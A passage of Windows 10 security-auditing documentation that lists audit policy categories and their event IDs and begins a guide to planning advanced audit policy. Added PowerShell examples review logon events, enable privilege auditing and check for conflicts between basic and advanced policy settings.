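        $note  = switch ($type) {
            8  { 'password reached the auth package unhashed (typically IIS Basic auth); confirm TLS on the wire' }
            9  { 'runas /netonly or similar: outbound credentials differ from the local identity' }
            10 { if ($first.IpAddress -notin $JumpHosts) { 'RDP from outside the jump-host list' } else { '' } }
            11 { 'cached credentials, DC not contacted: offline or stale-password logon' }
            default { '' }
        }
        [pscustomobject]@{
            LogonType = $type; Title = $LogonTitle[$type]; Account = $first.TargetUserName
            Source = $first.IpAddress; Count = $_.Count; Note = $note
        }
    }
}

# Constructed sample standing in for parsed 4624 events (not real log data).
$sample = @(
    [pscustomobject]@{ LogonType=2;  TargetUserName='alice';   IpAddress='-';         WorkstationName='WS01' },
    [pscustomobject]@{ LogonType=10; TargetUserName='bob';     IpAddress='10.0.0.9';  WorkstationName='WS02' },
    [pscustomobject]@{ LogonType=10; TargetUserName='bob';     IpAddress='10.0.0.9';  WorkstationName='WS02' },
    [pscustomobject]@{ LogonType=10; TargetUserName='bob';     IpAddress='10.0.0.44'; WorkstationName='WS02' },
    [pscustomobject]@{ LogonType=8;  TargetUserName='svc_web'; IpAddress='10.0.0.30'; WorkstationName='WEB1' },
    [pscustomobject]@{ LogonType=11; TargetUserName='carol';   IpAddress='-';         WorkstationName='LT07' }
)
Get-LogonReview -Logons $sample -JumpHosts '10.0.0.9' | Format-Table -AutoSize
# bob from 10.0.0.44, svc_web (type 8) and carol (type 11) get notes; alice and bob via the jump host do not.

# Live: let the event log service filter on type 8/10/11 from the last day
# (XPath over the event XML), then map the positional fields by name.
$since = (Get-Date).AddDays(-1).ToUniversalTime().ToString('o')
$xpath = "*[System[EventID=4624 and TimeCreated[@SystemTime>='$since']]] and " +
         "*[EventData[Data[@Name='LogonType']='8' or Data[@Name='LogonType']='10' or Data[@Name='LogonType']='11']]"
$live = Get-WinEvent -LogName Security -FilterXPath $xpath -ErrorAction SilentlyContinue | ForEach-Object {
    [pscustomobject]@{ LogonType = $_.Properties[8].Value; TargetUserName = $_.Properties[5].Value
                       WorkstationName = $_.Properties[11].Value; IpAddress = $_.Properties[18].Value }
}
if ($live) { Get-LogonReview -Logons $live -JumpHosts '10.0.0.9' | Format-Table -AutoSize }
```

Type 3 (Network) is by far the most common type and is deliberately left unannotated; filtering it server-side with the XPath predicate is what keeps the query cheap on a file server.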

Related topics
Basic security audit policy settings
Audit object access
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Determines whether to audit the event of a user accessing an object (for example, a file, folder, registry key, or printer) that has its own system access control list (SACL) specified.
If you define this policy setting, you can specify whether to audit successes, audit failures, or not audit the event
type at all. Success audits generate an audit entry when a user successfully accesses an object that has an
appropriate SACL specified. Failure audits generate an audit entry when a user unsuccessfully attempts to access
an object that has a SACL specified.
To set this value to No auditing, in the Properties dialog box for this policy setting, select the Define these policy
settings check box and clear the Success and Failure check boxes.

Note: You can set a SACL on a file system object using the Security tab in that object's Properties dialog
box.

Default: No auditing.

Configure this audit setting


You can configure this security setting by opening the appropriate policy under Computer
Configuration\Windows Settings\Security Settings\Local Policies\Audit Policy.

OBJECT ACCESS EVENTS  DESCRIPTION
560   Access was granted to an already existing object.
562   A handle to an object was closed.
563   An attempt was made to open an object with the intent to delete it. Note: This is used by file systems when the FILE_DELETE_ON_CLOSE flag is specified in CreateFile().
564   A protected object was deleted.
565   Access was granted to an already existing object type.
567   A permission associated with a handle was used. Note: A handle is created with certain granted permissions (Read, Write, and so on). When the handle is used, up to one audit is generated for each of the permissions that was used.
568   An attempt was made to create a hard link to a file that is being audited.
569   The resource manager in Authorization Manager attempted to create a client context.
570   A client attempted to access an object. Note: An event will be generated for every attempted operation on the object.
571   The client context was deleted by the Authorization Manager application.
572   The Authorization Manager application was initialized.
772   The certificate manager denied a pending certificate request.
773   Certificate Services received a resubmitted certificate request.
774   Certificate Services revoked a certificate.
775   Certificate Services received a request to publish the certificate revocation list (CRL).
776   Certificate Services published the certificate revocation list (CRL).
777   A certificate request extension was made.
778   One or more certificate request attributes changed.
779   Certificate Services received a request to shut down.
780   Certificate Services backup started.
781   Certificate Services backup completed.
782   Certificate Services restore started.
783   Certificate Services restore completed.
784   Certificate Services started.
785   Certificate Services stopped.
786   The security permissions for Certificate Services changed.
787   Certificate Services retrieved an archived key.
788   Certificate Services imported a certificate into its database.
789   The audit filter for Certificate Services changed.
790   Certificate Services received a certificate request.
791   Certificate Services approved a certificate request and issued a certificate.
792   Certificate Services denied a certificate request.
793   Certificate Services set the status of a certificate request to pending.
794   The certificate manager settings for Certificate Services changed.
795   A configuration entry changed in Certificate Services.
796   A property of Certificate Services changed.
797   Certificate Services archived a key.
798   Certificate Services imported and archived a key.
799   Certificate Services published the CA certificate to Active Directory.
800   One or more rows have been deleted from the certificate database.
801   Role separation enabled.

Related topics
Basic security audit policy settings
Audit policy change
4/5/2019 • 3 minutes to read

Applies to
Windows 10
Determines whether to audit every incident of a change to user rights assignment policies, audit policies, or trust
policies.
If you define this policy setting, you can specify whether to audit successes, audit failures, or not audit the event
type at all. Success audits generate an audit entry when a change to user rights assignment policies, audit policies,
or trust policies is successful. Failure audits generate an audit entry when a change to user rights assignment
policies, audit policies, or trust policies fails.
To set this value to No auditing, in the Properties dialog box for this policy setting, select the Define these
policy settings check box and clear the Success and Failure check boxes.
Default:
Success on domain controllers.
No auditing on member servers.

Configure this audit setting


You can configure this security setting under Computer Configuration\Windows Settings\Security Settings\Local
Policies\Audit Policy.

POLICY CHANGE EVENTS  DESCRIPTION
608   A user right was assigned.
609   A user right was removed.
610   A trust relationship with another domain was created.
611   A trust relationship with another domain was removed.
612   An audit policy was changed.
613   An Internet Protocol security (IPsec) policy agent started.
614   An IPsec policy agent was disabled.
615   An IPsec policy agent changed.
616   An IPsec policy agent encountered a potentially serious failure.
617   A Kerberos policy changed.
618   Encrypted Data Recovery policy changed.
620   A trust relationship with another domain was modified.
621   System access was granted to an account.
622   System access was removed from an account.
623   Per user auditing policy was set for a user.
625   Per user audit policy was refreshed.
768   A collision was detected between a namespace element in one forest and a namespace element in another forest. Note: When a namespace element in one forest overlaps a namespace element in another forest, it can lead to ambiguity in resolving a name belonging to one of the namespace elements. This overlap is also called a collision. Not all parameters are valid for each entry type. For example, fields such as DNS name, NetBIOS name, and SID are not valid for an entry of type "TopLevelName".
769   Trusted forest information was added.
770   Trusted forest information was deleted.
771   Trusted forest information was modified.
      Note for 769, 770, and 771: These event messages are generated when forest trust information is updated and one or more entries are added, deleted, or modified. One event message is generated per added, deleted, or modified entry. If multiple entries are added, deleted, or modified in a single update of the forest trust information, all the generated event messages share a single unique identifier called an operation ID, which lets you determine that they are the result of a single operation. Not all parameters are valid for each entry type. For example, parameters such as DNS name, NetBIOS name, and SID are not valid for an entry of type "TopLevelName".
805   The event log service read the security log configuration for a session.

Related topics
Basic security audit policy settings
Audit privilege use
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Determines whether to audit each instance of a user exercising a user right.
If you define this policy setting, you can specify whether to audit successes, audit failures, or not audit this type of
event at all. Success audits generate an audit entry when the exercise of a user right succeeds. Failure audits
generate an audit entry when the exercise of a user right fails.
To set this value to No auditing, in the Properties dialog box for this policy setting, select the Define these policy
settings check box and clear the Success and Failure check boxes.
Default: No auditing.
Audits are not generated for use of the following user rights, even if success audits or failure audits are specified for Audit privilege use. Auditing these rights tends to generate many events in the security log, which may impede your computer's performance. To audit them anyway, set the FullPrivilegeAuditing value (REG_BINARY, a single byte of 1) under HKLM\SYSTEM\CurrentControlSet\Control\Lsa; the Group Policy equivalent is the security option Audit: Audit the use of Backup and Restore privilege.
Bypass traverse checking
Debug programs
Create a token object
Replace process level token
Generate security audits
Back up files and directories
Restore files and directories
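The registry change described above, as an added example that is not part of the original page. It is included because the value type is a common trap: FullPrivilegeAuditing is REG_BINARY, and a DWORD of 1 written by mistake has no effect. The 256 MB log size is an illustrative choice, not a recommendation from the page.

```powershell
# Added example (not from the original page): enable auditing of the seven
# excluded privileges, make sure the Privilege Use category is on, and
# give the Security log room for the extra volume. Run elevated.
$lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'

function Get-FullPrivilegeAuditing {
    # $true only when the REG_BINARY value exists and its first byte is 1.
    $v = Get-ItemProperty -Path $lsa -Name FullPrivilegeAuditing -ErrorAction SilentlyContinue
    return ($null -ne $v -and $v.FullPrivilegeAuditing.Count -gt 0 -and $v.FullPrivilegeAuditing[0] -eq 1)
}

if (-not (Get-FullPrivilegeAuditing)) {
    # Binary, not DWORD: a REG_DWORD named FullPrivilegeAuditing is ignored.
    Set-ItemProperty -Path $lsa -Name FullPrivilegeAuditing -Value ([byte[]]@(1)) -Type Binary
}

# The registry value only lifts the exclusion; the category itself still has
# to be enabled (events 576/577/578, which are 4672/4673/4674 on Windows 10).
auditpol /set /category:"Privilege Use" /success:enable /failure:enable | Out-Null

# Backup and Restore auditing logs one event per file a backup job touches,
# so raise the Security log maximum (here 256 MB) before the next backup window.
wevtutil sl Security /ms:268435456

# Verify all three settings.
Get-FullPrivilegeAuditing
auditpol /get /category:"Privilege Use"
wevtutil gl Security | Select-String maxSize
```

Watch the log after the first backup run; if it fills and is set to overwrite, the flood of 4674 events will push out the logon and policy-change events you actually wanted to keep.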

Configure this audit setting


You can configure this security setting under Computer Configuration\Windows Settings\Security Settings\Local
Policies\Audit Policy.

PRIVILEGE USE EVENTS  DESCRIPTION
576   Specified privileges were added to a user's access token. Note: This event is generated when the user logs on.
577   A user attempted to perform a privileged system service operation.
578   Privileges were used on an already open handle to a protected object.

Related topics
Basic security audit policy settings
Audit process tracking
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Determines whether to audit detailed tracking information for events such as program activation, process exit,
handle duplication, and indirect object access.
If you define this policy setting, you can specify whether to audit successes, audit failures, or not audit the event
type at all. Success audits generate an audit entry when the process being tracked succeeds. Failure audits
generate an audit entry when the process being tracked fails.
To set this value to No auditing, in the Properties dialog box for this policy setting, select the Define these policy
settings check box and clear the Success and Failure check boxes.
Default: No auditing.

Configure this security setting


You can configure this security setting under Computer Configuration\Windows Settings\Security Settings\Local
Policies\Audit Policy.

PROCESS TRACKING EVENTS  DESCRIPTION
592   A new process was created.
593   A process exited.
594   A handle to an object was duplicated.
595   Indirect access to an object was obtained.
596   A data protection master key was backed up. Note: The master key is used by the CryptProtectData and CryptUnprotectData routines, and Encrypting File System (EFS). The master key is backed up each time a new one is created. (The default setting is 90 days.) The key is usually backed up to a domain controller.
597   A data protection master key was recovered from a recovery server.
598   Auditable data was protected.
599   Auditable data was unprotected.
600   A process was assigned a primary token.
601   A user attempted to install a service.
602   A scheduler job was created.

Related topics
Basic security audit policy settings
Audit system events
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Determines whether to audit when a user restarts or shuts down the computer or when an event occurs that
affects either the system security or the security log.
If you define this policy setting, you can specify whether to audit successes, audit failures, or not audit the event type at all. Success audits generate an audit entry when a system event is executed successfully. Failure audits generate an audit entry when a system event is attempted unsuccessfully.
To set this value to No auditing, in the Properties dialog box for this policy setting, select the Define these
policy settings check box and clear the Success and Failure check boxes.
Default:
Success on domain controllers.
No auditing on member servers.

Configure this audit setting


You can configure this security setting by opening the appropriate policy under Computer Configuration\Windows
Settings\Security Settings\Local Policies\Audit Policy.

SYSTEM EVENTS  DESCRIPTION
512   Windows is starting up.
513   Windows is shutting down.
514   An authentication package was loaded by the Local Security Authority.
515   A trusted logon process has registered with the Local Security Authority.
516   Internal resources allocated for the queuing of security event messages have been exhausted, leading to the loss of some security event messages.
517   The audit log was cleared.
518   A notification package was loaded by the Security Accounts Manager.
519   A process is using an invalid local procedure call (LPC) port in an attempt to impersonate a client and reply or read from or write to a client address space.
520   The system time was changed. Note: This audit normally appears twice.

Related topics
Basic security audit policy settings
Advanced security audit policies
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Advanced security audit policy settings are found in Security Settings\Advanced Audit Policy Configuration\System Audit Policies and appear to overlap with basic security audit policies, but they are recorded and applied differently. When you apply basic audit policy settings to the local computer by using the Local Security Policy snap-in, you are editing the effective audit policy, so changes made to basic audit policy settings will appear exactly as configured in Auditpol.exe. In Windows 7 and later, advanced security audit policies can be controlled by using Group Policy.
Do not mix the two on the same computer. A basic category setting that is applied later overwrites the subcategory settings beneath it, unless the security option Audit: Force audit policy subcategory settings (Windows Vista or later) to override audit policy category settings is enabled, in which case Windows ignores the basic settings and keeps the subcategory configuration.
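A check for the situation described above, as an added example that is not part of the original page: it reads the effective policy that Auditpol.exe reports, tells you whether the override option is in force (Windows stores it as the SCENoApplyLegacyAuditPolicy registry value), and compares the result against a small baseline of subcategories. The baseline list is hypothetical; substitute your own.

```powershell
# Added example (not from the original page): report the effective audit
# policy and whether advanced (subcategory) settings are protected from
# being overwritten by basic (category) settings.
function Get-EffectiveAuditPolicy {
    # auditpol /r prints CSV; keep only lines that look like CSV rows in case
    # a blank line precedes the header.
    auditpol /get /category:* /r |
        Where-Object { $_ -match ',' } |
        ConvertFrom-Csv |
        Select-Object @{ n='Subcategory'; e={ $_.Subcategory.Trim() } }, 'Inclusion Setting'
}

function Test-AdvancedPolicyOverride {
    # $true when "Audit: Force audit policy subcategory settings ... to
    # override audit policy category settings" is enabled.
    $lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $v = (Get-ItemProperty -Path $lsa -Name SCENoApplyLegacyAuditPolicy -ErrorAction SilentlyContinue).SCENoApplyLegacyAuditPolicy
    return ($v -eq 1)
}

$policy = Get-EffectiveAuditPolicy
$policy | Where-Object { $_.'Inclusion Setting' -ne 'No Auditing' } | Format-Table -AutoSize

if (-not (Test-AdvancedPolicyOverride)) {
    Write-Warning 'Override option is off: a basic category setting from Group Policy can silently replace these subcategory settings.'
}

# Hypothetical baseline of subcategories that should be on; report any that are off.
$baseline = 'Logon', 'Logoff', 'Special Logon', 'Process Creation', 'Audit Policy Change', 'Security State Change'
$policy |
    Where-Object { $_.Subcategory -in $baseline -and $_.'Inclusion Setting' -eq 'No Auditing' } |
    ForEach-Object { Write-Warning "Subcategory '$($_.Subcategory)' is not audited" }
```

Run it after a Group Policy refresh (gpupdate /force) as well as right after editing the policy: the interesting failure is a subcategory that looks right in the editor but reverts once the domain policy reapplies.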

In this section

| TOPIC | DESCRIPTION |
|---|---|
| Planning and deploying advanced security audit policies | This topic for the IT professional explains the options that security policy planners must consider and the tasks they must complete to deploy an effective security audit policy in a network that includes advanced security audit policies. |
| Advanced security auditing FAQ | This topic for the IT professional lists questions and answers about understanding, deploying, and managing security audit policies. |
| Using advanced security auditing options to monitor dynamic access control objects | This guide explains the process of setting up advanced security auditing capabilities that are made possible through settings and events that were introduced in Windows 8 and Windows Server 2012. |
| Advanced security audit policy settings | This reference for IT professionals provides information about the advanced audit policy settings that are available in Windows and the audit events that they generate. |
Planning and deploying advanced security audit policies
4/5/2019 • 35 minutes to read

Applies to
Windows 10
This topic for the IT professional explains the options that security policy planners must consider and the tasks
they must complete to deploy an effective security audit policy in a network that includes advanced security audit
policies.
Organizations invest a large portion of their information technology budgets on security applications and services,
such as antimalware software, firewalls, and encryption. But no matter how much security hardware or software
you deploy, how tightly you control the rights of users, or how carefully you configure security permissions on
your data, you should not consider the job complete unless you have a well-defined, timely auditing strategy to
track the effectiveness of your defenses and identify attempts to circumvent them.
To be well defined and timely, an auditing strategy must provide useful tracking data for an organization's most
important resources, critical behaviors, and potential risks. In a growing number of organizations, it must also
provide absolute proof that IT operations comply with corporate and regulatory requirements.
Unfortunately, no organization has unlimited resources to monitor every resource and activity on a network. If you
do not plan well, you will likely have gaps in your auditing strategy. However, if you try to audit every resource and
activity, you may find yourself with far too much monitoring data, including thousands of benign audit entries that
an analyst needs to sift through to identify the narrow set of entries that warrant closer examination. This could
cause delays or even prevent auditors from identifying suspicious activity. Thus, too much monitoring can leave an
organization as vulnerable as not enough monitoring.
Here are some features that can help you focus your effort:
Advanced audit policy settings. You can apply and manage detailed audit policy settings through Group
Policy.
"Reason for access" auditing. You can specify and identify the permissions that were used to generate a
particular object access security event.
Global object access auditing. You can define system access control lists (SACLs) for an entire computer file
system or registry.
To deploy these features and plan an effective security auditing strategy, you need to:
Identify your most critical resources and the most important activities that need to be tracked.
Identify the audit settings that can be used to track these activities.
Assess the advantages and potential costs associated with each.
Test these settings to validate your choices.
Develop plans for deploying and managing your audit policy.

About this guide


This document will guide you through the steps needed to plan a security auditing policy that uses Windows
auditing features. This policy must identify and address vital business needs, including:
Network reliability
Regulatory requirements
Protection of the organization's data and intellectual property
Users, including employees, contractors, partners, and customers
Client computers and applications
Servers and the applications and services running on those servers
The audit policy also must identify processes for managing audit data after it has been logged, including:
Collecting, evaluating, and reviewing audit data
Storing and (if required) disposing of audit data
By carefully planning, designing, testing, and deploying a solution based on your organization's business
requirements, you can provide the standardized functionality, security, and management control that your
organization needs.

Understanding the security audit policy design process


The process of designing and deploying a Windows security audit policy involves the following tasks, which are
described in greater detail throughout this document:
Identifying your Windows security audit policy deployment goals
This section helps define the business objectives that will guide your Windows security audit policy. It also
helps you define the resources, users, and computers that will be the focus of your security auditing.
Mapping the security audit policy to groups of users, computers, and resources in your organization
This section explains how to integrate security audit policy settings with domain Group Policy settings for
different groups of users, computers, and resources. In addition, if your network includes multiple versions
of Windows client and server operating systems, it also explains when to use basic audit policy settings and
when to use advanced security audit policy settings.
Mapping your security auditing goals to a security audit policy configuration
This section explains the categories of Windows security auditing settings that are available. It also identifies
individual Windows security auditing policy settings that can be of particular value to address auditing
scenarios.
Planning for security audit monitoring and management
This section helps you plan to collect, analyze, and store Windows audit data. Depending on the number of
computers and types of activity that you want to audit, Windows event logs can fill up quickly. In addition,
this section explains how auditors can access and aggregate event data from multiple servers and desktop
computers. It also explains how to address storage requirements, including how much audit data to store
and how it must be stored.
Deploying the security audit policy
This section provides recommendations and guidelines for the effective deployment of a Windows security
audit policy. Configuring and deploying Windows audit policy settings in a test lab environment can help
you confirm that the settings you have selected will produce the type of audit data you need. However, only
a carefully staged pilot and incremental deployments based on your domain and organizational unit (OU)
structure will enable you to confirm that the audit data you generate can be monitored and that it meets
your organization's audit needs.
Identifying your Windows security audit policy deployment goals
A security audit policy must support and be a critical and integrated aspect of an organization's overall security
design and framework.
Every organization has a unique set of data and network assets (such as customer and financial data and trade
secrets), physical resources (such as desktop computers, portable computers, and servers), and users (which can
include various internal groups such as finance and marketing, and external groups such as partners, customers,
and anonymous users on the website). Not all of these assets, resources, and users justify the cost of an audit. Your
task is to identify which assets, resources, and users provide the strongest justification for the focus of a security
audit.
To create your Windows security audit plan, begin by identifying:
The overall network environment, including the domains, OUs, and security groups.
The resources on the network, the users of those resources, and how those resources are being used.
Regulatory requirements.
Network environment
An organization's domain and OU structure provide a fundamental starting point for thinking about how to apply
a security audit policy because it likely provides a foundation of Group Policy Objects (GPOs) and logical grouping
of resources and activities that you can use to apply the audit settings that you choose. It is also likely that certain
portions of your domain and OU structure already provide logical groups of users, resources, and activities that
justify the time and resources needed to audit them. For information about how to integrate a security audit policy
with your domain and OU structure, see Mapping security audit policy to groups of users, computers, and
resources in your organization later in this document.
In addition to your domain model, you should also find out whether your organization creates and maintains a
systematic threat model. A good threat model can help you identify threats to key components in your
infrastructure, so you can define and apply audit settings that enhance the organization's ability to identify and
counter those threats.

Important: Including auditing within your organization's security plan also makes it possible to budget your
resources on the areas where auditing can achieve the most positive results.

For additional details about how to complete each of these steps and how to prepare a detailed threat model,
download the IT Infrastructure Threat Modeling Guide.
Data and resources
For data and resource auditing, you need to identify the most important types of data and resources (such as
patient records, accounting data, or marketing plans) that can benefit from the closer monitoring that Windows
auditing can provide. Some of these data resources might already be monitored through auditing features in
products such as Microsoft SQL Server and Exchange Server. If so, you may want to consider how Windows
auditing features can enhance the existing audit strategy. As with the domain and OU structure discussed
previously, security auditing should focus on your most critical resources. You also must consider how much audit
data you will be able to manage.
You can record if these resources have high business impact, medium business impact, or low business impact, the
cost to the organization if these data resources are accessed by unauthorized users, and the risk that this access
can pose to the organization. The type of access by users (such as Read, Modify, or Copy) can also pose different
levels of risk to an organization.
Increasingly, data access and use is governed by regulations, and a breach can result in severe penalties and a loss
in credibility for the organization. If regulatory compliance plays a role in how you manage your data, be sure to
also document this information.
The following table provides an example of a resource analysis for an organization.

| RESOURCE CLASS | WHERE STORED | ORGANIZATIONAL UNIT | BUSINESS IMPACT | SECURITY OR REGULATORY REQUIREMENTS |
|---|---|---|---|---|
| Payroll data | Corp-Finance-1 | Accounting: Read/Write on Corp-Finance-1; Departmental Payroll Managers: Write only on Corp-Finance-1 | High | Financial integrity and employee privacy |
| Patient medical records | MedRec-2 | Doctors and Nurses: Read/Write on MedRec-2; Lab Assistants: Write only on MedRec-2; Accounting: Read only on MedRec-2 | High | Strict legal and regulatory standards |
| Consumer health information | Web-Ext-1 | Public Relations Web Content Creators: Read/Write on Web-Ext-1; Public: Read only on Web-Ext-1 | Low | Public education and corporate image |

Users
Many organizations find it useful to classify the types of users they have and base permissions on this
classification. This same classification can help you identify which user activities should be the subject of security
auditing and the amount of audit data they will generate.
Organizations can create distinctions based on the type of rights and permissions needed by users to perform
their jobs. For example, under the classification Administrators, larger organizations might assign local
administrator responsibilities for a single computer, for specific applications such as Exchange Server or SQL
Server, or for an entire domain. Under Users, permissions and Group Policy settings can apply to as many as all
users in an organization or as few as a subset of the employees in a given department.
Also, if your organization is subject to regulatory requirements, user activities such as accessing medical records or
financial data may need to be audited to verify that you are complying with these requirements.
To effectively audit user activity, begin by listing the different types of users in your organization and the types of
data they need access to—in addition to the data they should not have access to.
Also, if external users can access any of your organization's data, be sure to identify them, including if they belong
to a business partner, customer, or general user, the data they have access to, and the permissions they have to
access that data.
The following table illustrates an analysis of users on a network. Although our example contains a single column
titled "Possible auditing considerations," you may want to create additional columns to differentiate between
different types of network activity, such as logon hours and permission use.

| GROUPS | DATA | POSSIBLE AUDITING CONSIDERATIONS |
|---|---|---|
| Account administrators | User accounts and security groups | Account administrators have full privileges to create new user accounts, reset passwords, and modify security group memberships. We need a mechanism to monitor these changes. |
| Members of the Finance OU | Financial records | Users in Finance have Read/Write access to critical financial records, but no ability to change permissions on these resources. These financial records are subject to government regulatory compliance requirements. |
| External partners | Project Z | Employees of partner organizations have Read/Write access to certain project data and servers relating to Project Z, but not to other servers or data on the network. |

Computers
Security and auditing requirements and audit event volume can vary considerably for different types of computers
in an organization. These requirements can be based on:
If the computers are servers, desktop computers, or portable computers.
The important applications the computers run, such as Exchange Server, SQL Server, or Forefront Identity
Manager.

Note: Server applications (including Exchange Server and SQL Server) may have audit settings of their own,
which your plan should take into account. For more information about auditing in Exchange Server, see the
Exchange 2010 Security Guide. For more information about auditing in SQL Server 2008, see Auditing
(Database Engine). For SQL Server 2012, see SQL Server Audit (Database Engine).

The operating system versions.

Note: The operating system version determines which auditing options are available and the volume of
audit event data.

The business value of the data.


For example, a web server that is accessed by external users requires different audit settings than a root
certification authority (CA) that is never exposed to the public Internet or even to regular users on the
organization's network.
The following table illustrates an analysis of computers in an organization.

| TYPE OF COMPUTER AND APPLICATIONS | OPERATING SYSTEM VERSION | WHERE LOCATED |
|---|---|---|
| Servers hosting Exchange Server | Windows Server 2008 R2 | ExchangeSrv OU |
| File servers | Windows Server 2012 | Separate resource OUs by department and (in some cases) by location |
| Portable computers | Windows Vista and Windows 7 | Separate portable computer OUs by department and (in some cases) by location |
| Web servers | Windows Server 2008 R2 | WebSrv OU |

Regulatory requirements
Many industries and locales have strict and specific requirements for network operations and how resources are
protected. In the health care and financial industries, for example, there are strict guidelines for who has access to
records and how they are used. Many countries have strict privacy rules. To identify regulatory requirements, work
with your organization's legal department and other departments responsible for these requirements. Then
consider the security configuration and auditing options that can be used to comply with and verify compliance
with these regulations.
For more info, see the System Center Process Pack for IT GRC.

Mapping the security audit policy to groups of users, computers, and resources in your organization
By using Group Policy, you can apply your security audit policy to defined groups of users, computers, and
resources. To map a security auditing policy to these defined groups in your organization, you should understand
the following considerations for using Group Policy to apply security audit policy settings:
The policy settings you identify can be applied by using one or more GPOs. To create and edit a GPO, use the
Group Policy Management Console (GPMC). By using the GPMC to link a GPO to selected Active Directory
sites, domains, and OUs, you apply the policy settings in the GPO to the users and computers in those Active
Directory objects. An OU is the lowest-level Active Directory container to which you can assign Group Policy
settings.
For every policy setting that you select, you need to decide whether it should be enforced across the
organization, or whether it should apply only to selected users or computers. You can then combine these audit
policy settings into GPOs and link them to the appropriate Active Directory containers.
By default, options set in GPOs that are linked to higher levels of Active Directory sites, domains, and OUs
are inherited by all OUs at lower levels. However, a GPO that is linked at a lower level can overwrite
inherited policies.
For example, you might use a domain GPO to assign an organization-wide group of audit settings, but want
a certain OU to get a defined group of additional settings. To accomplish this, you can link a second GPO to
that specific lower-level OU. Therefore, a logon audit setting that is applied at the OU level will override a
conflicting logon audit setting that is applied at the domain level (unless you have taken special steps to
apply Group Policy loopback processing).
Audit policies are computer policies. Therefore, they must be applied through GPOs that are applied to
computer OUs, not to user OUs. However, in most cases you can apply audit settings for only specified
resources and groups of users by configuring SACLs on the relevant objects. This enables auditing for a
security group that contains only the users you specify.
For example, you could configure a SACL for a folder called Payroll Data on Accounting Server 1. This can
audit attempts by members of the Payroll Processors security group to delete objects from this folder. The
Object Access\Audit File System audit policy setting applies to Accounting Server 1, but because it requires a
corresponding resource SACL, only actions by members of the Payroll Processors group on the Payroll Data
folder generate audit events. (A SACL entry names a security principal such as a group, not an OU, so put
the users you want audited into a group.)
Group Policy support for advanced security audit policy settings was introduced in Windows Server 2008 R2
and Windows 7, and the settings can be applied to those operating systems and later. They are applied by
using Group Policy or, where that is not possible, by running Auditpol.exe (for example, from a logon script).

Important: Whether you apply advanced audit policies by using Group Policy or by using logon scripts,
do not use both the basic audit policy settings under Local Policies\Audit Policy and the advanced
settings under Security Settings\Advanced Audit Policy Configuration. Using both basic and
advanced audit policy settings can cause unexpected results in audit reporting.

If you use Advanced Audit Policy Configuration settings or use logon scripts to apply advanced audit
policies, be sure to enable the Audit: Force audit policy subcategory settings (Windows Vista or
later) to override audit policy category settings policy setting under Local Policies\Security
Options. This will prevent conflicts between similar settings by forcing basic security auditing to be
ignored.
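One way to verify this on a given computer, as an added example rather than anything from the original guide: the PowerShell below reads the registry value behind the "Audit: Force audit policy subcategory settings (Windows Vista or later) to override audit policy category settings" option (the SCENoApplyLegacyAuditPolicy DWORD under HKLM\SYSTEM\CurrentControlSet\Control\Lsa) and then parses the effective advanced policy that Auditpol.exe reports in CSV form. The list of subcategories it checks is an assumed set drawn from the settings discussed later in this guide; adjust it to your own plan.

```powershell
# Added example, not part of the original page. Run in an elevated PowerShell
# session on the computer being checked.

# The "Audit: Force audit policy subcategory settings ..." security option is
# stored as this DWORD; 1 means basic category settings are ignored in favour
# of the advanced subcategory settings.
$lsaKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$force  = (Get-ItemProperty -Path $lsaKey -Name SCENoApplyLegacyAuditPolicy `
            -ErrorAction SilentlyContinue).SCENoApplyLegacyAuditPolicy

if ($force -eq 1) {
    Write-Host 'OK: subcategory (advanced) settings override basic category settings.'
} else {
    Write-Warning 'SCENoApplyLegacyAuditPolicy is not 1; basic and advanced audit settings may conflict.'
    Write-Warning 'Enable "Audit: Force audit policy subcategory settings ..." under Local Policies\Security Options.'
}

# auditpol /get /category:* /r emits CSV with the columns:
# Machine Name, Policy Target, Subcategory, Subcategory GUID,
# Inclusion Setting, Exclusion Setting.
$effective = auditpol.exe /get /category:* /r |
    Where-Object { $_ -and $_.Trim() } |     # drop any blank lines before the header
    ConvertFrom-Csv

# Assumed list of subcategories this plan cares about (names as Auditpol.exe
# prints them); edit to match your own audit plan.
$wanted = @(
    'Credential Validation', 'Logon', 'Logoff', 'Account Lockout', 'Special Logon',
    'Process Creation', 'File System', 'File Share', 'Handle Manipulation',
    'Registry', 'Directory Service Access', 'Directory Service Changes',
    'Sensitive Privilege Use'
)

$report = $effective |
    Where-Object { $wanted -contains $_.Subcategory } |
    Select-Object Subcategory, 'Inclusion Setting'

$report | Format-Table -AutoSize

# Anything still at "No Auditing" is a gap relative to the plan.
$gaps = $report | Where-Object { $_.'Inclusion Setting' -eq 'No Auditing' }
if ($gaps) {
    Write-Warning ('Not audited: ' + ($gaps.Subcategory -join ', '))
}
```

Running this on a pilot machine before and after the GPO is linked is a quick way to confirm that the advanced settings actually took effect and that no category-level setting is still being applied underneath them.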
The following are examples of how audit policies can be applied to an organization's OU structure:
Apply data activity settings to an OU that contains file servers. If your organization has servers that contain
particularly sensitive data, consider putting them in a separate OU so that you can configure and apply a more
precise audit policy to these servers.
Apply user activity audit policies to an OU that contains all computers in the organization. If your organization
places users in OUs based on the department they work in, consider configuring and applying more detailed
security permissions on critical resources that are accessed by employees who work in more sensitive areas,
such as network administrators or the legal department.
Apply network and system activity audit policies to OUs that contain the organization's most critical servers,
such as domain controllers, CAs, email servers, or database servers.

Mapping your security auditing goals to a security audit policy configuration
After you identify your security auditing goals, you can begin to map them to a security audit policy configuration.
This audit policy configuration must address your most critical security auditing goals, but it also must address
your organization's constraints, such as the number of computers that need to be monitored, the number of
activities that you want to audit, the number of audit events that your desired audit configuration will generate,
and the number of administrators available to analyze and act upon audit data.
To create your audit policy configuration, you need to:
1. Explore all of the audit policy settings that can be used to address your needs.
2. Choose the audit settings that will most effectively address the audit requirements identified in the previous
section.
3. Confirm that the settings you choose are compatible with the operating systems running on the computers that
you want to monitor.
4. Decide which configuration options (Success, Failure, or both Success and Failure) you want to use for the audit
settings.
5. Deploy the audit settings in a lab or test environment to verify that they meet your desired results in terms of
volume, supportability, and comprehensiveness. Then deploy the audit settings in a pilot production
environment to ensure that your estimates of how much audit data your audit plan will generate are realistic
and that you can manage this data.
Exploring audit policy options
